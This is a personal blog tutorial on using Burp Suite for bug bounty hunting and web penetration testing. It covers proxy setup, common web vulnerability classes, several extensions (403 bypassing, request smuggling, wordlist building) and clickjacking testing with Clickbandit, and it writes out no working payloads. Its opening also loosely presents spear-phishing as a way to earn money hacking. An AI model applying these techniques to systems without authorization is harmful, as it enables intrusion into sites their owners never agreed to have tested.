top of page
Writer's pictureNitin Yadav

How to Master Burp-suite for BugBounty Hunting And Penetration Testing to earn money in 2022?

Do you want to earn money hacking?

Do you want to hack like a pro?



If these are the questions that bother you then you are in the right place.


I am Nitin Yadav(KD) and today I will teach you how you can master burp-suite pro and will help you in your hacking journey.


So hacking for money is a growing industry.


There are a variety of ways to make money hacking, from finding and exploiting vulnerabilities in software to spear-phishing and social engineering.




There are a few things you can do to get started, and we'll cover some of the most important steps in a little bit. First, you'll need to have a decent understanding of how computers work.


This doesn't have to be an expert level, but you should at least be able to understand the basics of how a computer operates.


Next, you'll need to learn how to use a variety of hacking tools. This includes programs like Malwarebytes, which can help detect and remove malicious software.


Finally, you'll need to learn how to hack websites.


And assuming you have the knowledge discussed above.



So let's first talk about the Burp suite.


So it doesn't matter if you are a hacker, bug bounty hunter, penetration tester, developer, security professional, or someone who wants to understand the working of a website.


Then you need the proxy to understand the application and there are many applications for that.


There are some of the proxies mentioned below

  • Fiddler

  • Paros proxy

  • BurpSuite

  • OWASP ZAP

Here we are going to talk about BurpSuite.


So now a question arises "What is BurpSuite".



What is BurpSuite?


BurpSuite is a set of tools used for penetration testing of web applications. It is an integrated platform/graphical tool for performing security testing of web applications.


It is the most popular tool among professional web security researchers and bug bounty hunters.


Burp has various tools which work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface to finding and exploiting security vulnerabilities.


It is a Java-based Web Penetration Testing framework. and is installed by default on Kali Linux.


A company named Portswigger has developed it and it aims to be an all-in-one set of tools. Its capabilities can be enhanced by installing add-ons that are called BApps.


So now let's understand how the tool works.


So while browsing on our target application we can configure the internet browser to route traffic through the Burp Suite proxy server. Burp will then acts as a Man in the Middle by capturing and analyzing each and every request to and from the target web application so that we can analyze that.


We as hackers can pause, manipulate and replay individual HTTP requests in order to analyze potential parameters or injection points.


Injection points can be specified for manual as well as automated fuzzing attacks to discover potentially unintended application behaviors, crashes, and error messages.


So let's talk about what defines it in hundreds of other web app testing frameworks and why most of the penetration testers prefer it on other tools its simplicity, beautiful user interface, and ability to integrate extensions to provide additional functionality that is not included by default.



Now let's see what are the top vulnerabilities which are included in the burp suite which can be found by scanning.

  • Injection - This includes vulnerabilities that are exploited by sending untrusted input to an interpreter either as part of a query or command. Specially crafted input tricks are what the interpreter uses in executing the commands or even giving unauthorized access to data. The most common type of injection is a database injection. Other types include the Operating System (OS) command injection or LDAP Injection, etc

  • Broken Authentication – This includes vulnerabilities arising out of poor implementation of authentication and session management functions. Exploiting such vulnerabilities can give attackers access to passwords, credentials, session tokens, keys, etc

  • Sensitive Data Exposure – Many times, applications lack controls to protect sensitive user data like personally identifiable information (PII), health data, or even financial data. Attackers can steal such sensitive data. Lack of data encryption at rest and in transit cause most of the vulnerabilities related to sensitive data exposure.

  • XML External Entities – This is a special type of vulnerability wherein an attacker exploits the entity tag within the XML documents to launch several attacks like disclosing sensitive internal files, denial of service, remote code execution, etc.

  • Broken Access Control – Even if a user is authenticated with valid credentials, it might not be necessary to have access to all of the applications. Authorization defines what an authenticated user can access. Broken authorization gives unauthorized access to the attacker to view other user accounts, and sensitive files, or even modify other users’ data.

  • Security Misconfiguration – Security misconfiguration issues are the most common in the underlying infrastructure like web servers. Insecure configurations, default credentials, unreferenced backup files, unwanted services, open cloud storage, missing security headers and cookie flags, and missing security patches all contribute to the security misconfiguration category.

  • Cross-Site Scripting – This is indeed the classic web application vulnerability that has been part of the OWASP list for so long. This commonly occurs when an attacker is able to inject and execute a script through an application input field. This attack can be used to hijack user sessions by stealing cookies, defacing websites, etc. Common types of cross-site scripting include Persistent, Reflected, and DOM Based.

  • Insecure Deserialization – Attackers can manipulate the object serialization and deserialization process to introduce malicious payloads resulting in code execution.

  • Using Components with Known Vulnerabilities – It’s very common for developers to import and use third-party code to avoid reinventing the wheel. However, at times the third-party code comes along with inherent vulnerabilities. An example is using the OpenSSL library, which is vulnerable to a Heart Bleed attack.

  • Insufficient Logging and Monitoring – Quite often, applications lack capabilities to log events that would help in case of an incident. In the absence of audit logging and detection capabilities, attackers can simply continue to infiltrate without getting detected or raising alarms.

  • And much more.

What is the Need for BurpSuite?

As we all know that today the market for security and testing tools is growing rapidly growing. And there are so many tools available, commercial as well as free.


But now most of the tools are inclined toward automated scanning to find vulnerabilities.


So this can be achieved either by first crawling and then scanning for vulns or you can use spiders and then pass the result through an automated scanner.


(Tip: As these scanners are really great but nothing can beat manual testing so always confirm any vuln by testing manually)


Now let's move to some of the tips which will help you in testing for vulnerabilities.



Platform Authentication: So let's say we have an application hosted on the target server and protected by authentication. So here we need to configure the credentials in Burp Suite. If we don't provide Burp with credentials, it won't be able to access the protected portion of the application.


To configure platform authentication follow the steps below:

Step - 1:

Step - 2:

Step -3:

Step - 4: Now click on add button and a popup window will appear

Step - 5:

Now configure the destination host either in the form of an IP address or hostname, authentication type either of Basic, NTLM V2, NTLM V1, Digest, Username and Password, and the Domain if applicable.


Once these settings are recorded, Burp Suite can seamlessly access the protected part of the application with the help of these credentials.


Upstream Proxy Servers: Now let's say we are testing a web application in a certain environment and there is no access to the target application. So here we need to connect to a proxy server and then connect to the target application


Now to configure the upstream proxy server we need to follow the steps mentioned below


Step - 1:

Step - 2:

Step -3:

Step -4:

Step -5:

Now configure the required proxy settings.


JSON Beautifier: Json beautifier is an extension that stands for JavaScript Object Notation. It is a lightweight format for either storing or transporting data. One of the best aspects of a JSON format is that it’s easy to understand.


It helps in beautifying and will help us understand the API.

HTTP Request Smuggling extension: HTTP Request Smuggling attacks are tough to pull off and a lot harder to test, especially when there are some restrictions in place. Also, there are a lot of Request Smuggling attacks possible, but it is not feasible to test all of them manually as they require precision in terms of Content-Length or Transfer-Encoding header.

To get you out of your misery, HTTP Request Smuggler is yet another Burp Suite extension that helps you to automate HTTP Request Smuggling attacks. Just switch to the BApp section and download the HTTP Request Smuggler Plugin.


Cloud Storage Tester: More and more companies are opting for cloud-based services.


The major leaders in this domain are AWS, Google, and Microsoft Azure. What if we are a newbie and just started with web application hacking? It might be a little tough to test the services in the cloud when you hardly know what they are and how to test them. Cloud Storage Tester comes to your rescue.


It’ll test for misconfiguration issues on the Cloud Based Storage Services, hence the name Cloud Storage Tester. All it requires on your end is to supply an Access or a Secret Key.


It’ll automatically perform a scan and test for common misconfiguration issues. If you don’t have an access key, it can still perform some passive checks and tests.



403bypasser: After a lot of effort, you come across a potentially vulnerable end-point but receive a 403-status code.


Believe me, there’s nothing more disheartening than receiving a 403 Response Code.

403Bypasser will automatically scan for 403 Response Codes and try to find a workaround/bypass them.


Scavenger: Burp extension to create target-specific and tailored wordlist from burp history.

What this extension does is while crawling the targeted website it will create a wordlist in the background which you can use while fuzzing for directories, passwords, and paths.


How to find Clickjacking: Clickjacking is the act of manipulating a user’s navigation behavior on the web by tricking them into clicking on a malicious link.


This can be done by hiding the true destination of the link until after the user has clicked it, or by using deceptive web design to make it look like the destination is the desired one.


Once a user has clicked on a malicious link, a hacker can take advantage of their trust in the website to perform malicious actions on their behalf, such as stealing their personal information or hijacking their online session


So for finding clickjacking we will use clickbandit. so to find it

It will look like this

Now you need to click on Copy Clickbandit to clipboard and we are ready to go.


So we have our clickbandit code on our clipboard and we need a browser that is configured with burp which you must have so let's find a clickjacking vuln.


Once we are on our targeted website we will inspect element for that right click>>inspect


Now move to the console and paste the code which we have copied from burp.


After that, the record mode will be on and will look like this.

Let's click on start for record mode and as soon as you click on start the page will be loaded.


Now the next step will be to click on the element which you want to test for a clickjacking attack.


It will record what we will be doing now so after you are done you will have to click on finish.


and after that you will see that you have been click jacked when you will click on the location where you wanted to test and if this happens


Congrats you found a vuln.



So that is it for today guys we will continue this blog with some other tricks and tips on burp suite in another blog.


I hope you enjoyed this one


please comment down below😊


I see you next time :)


Take care and stay safe!





461 views0 comments

Comments


bottom of page